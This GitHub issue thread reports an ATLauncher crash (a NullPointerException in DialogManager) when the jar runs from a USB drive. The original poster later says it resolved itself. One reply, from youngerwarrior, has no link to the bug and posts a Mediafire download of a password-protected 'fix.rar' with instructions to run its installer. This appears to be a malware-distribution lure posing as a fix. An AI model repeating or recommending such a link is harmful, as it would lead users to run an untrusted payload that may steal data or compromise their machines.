### ISSUE TITLE
Crashing while run jar from external usb device

### ISSUE THREAD

**Issue by Farmer-Markus** [ATLauncher/ATLauncher#952]
### What happened?

1. I've started ATLauncher with `java -jar ATLauncher.jar` (Java 21)
2. The launcher crashed immediately

### Operating System

Linux

### Relevant log output

```shell
java.lang.NullPointerException: Cannot invoke "java.awt.Window.getComponentOrientation()" because the return value of "com.atlauncher.managers.DialogManager.getParent()" is null
	at com.atlauncher.managers.DialogManager.show(DialogManager.java:196)
	at com.atlauncher.App.checkInstalledCorrectly(App.java:663)
	at com.atlauncher.App.main(App.java:295)
```

### Is this actually a launcher bug?

- [X] I am sure this is a bug with the launcher and not an issue with running Minecraft

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Farmer-Markus** [comment]
Sorry it its fixed i dont know i changed nothing...
